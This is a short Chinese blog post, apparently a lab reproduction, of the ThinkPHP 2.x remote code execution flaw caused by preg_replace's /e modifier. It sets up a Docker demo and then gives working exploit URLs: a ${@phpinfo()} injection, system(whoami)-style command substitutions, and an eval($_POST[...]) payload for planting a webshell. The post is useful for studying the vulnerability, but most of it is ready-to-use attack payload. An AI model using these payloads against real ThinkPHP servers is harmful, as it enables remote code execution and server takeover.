ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由:
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));
环境搭建
执行如下命令启动ThinkPHP 2.1的Demo应用:
docker-compose up -d
环境启动后,访问http://your-ip:8080/Index/Index即可查看到默认页面。
漏洞复现
直接访问http://your-ip:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D即可执行phpinfo():
http://192.168.84.201:8080/index.php?s=/index/index/name/${@phpinfo()}
经过测试:
phpinfo()可以用system(id)、system(whoami)、passthru(whoami)等替换,命令中间不能存在空格,ls /tmp拿不到靶场flag,考虑写马getshell:
http://192.168.84.201:8080/index.php?s=/Index/index/name/${@print(eval($_POST[444]))}
一切违法行为,与本人无关
分类:
漏洞复现
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· 阿里巴巴 QwQ-32B真的超越了 DeepSeek R-1吗?
· 【译】Visual Studio 中新的强大生产力特性
· 【设计模式】告别冗长if-else语句:使用策略模式优化代码结构
· 10年+ .NET Coder 心语 ── 封装的思维:从隐藏、稳定开始理解其本质意义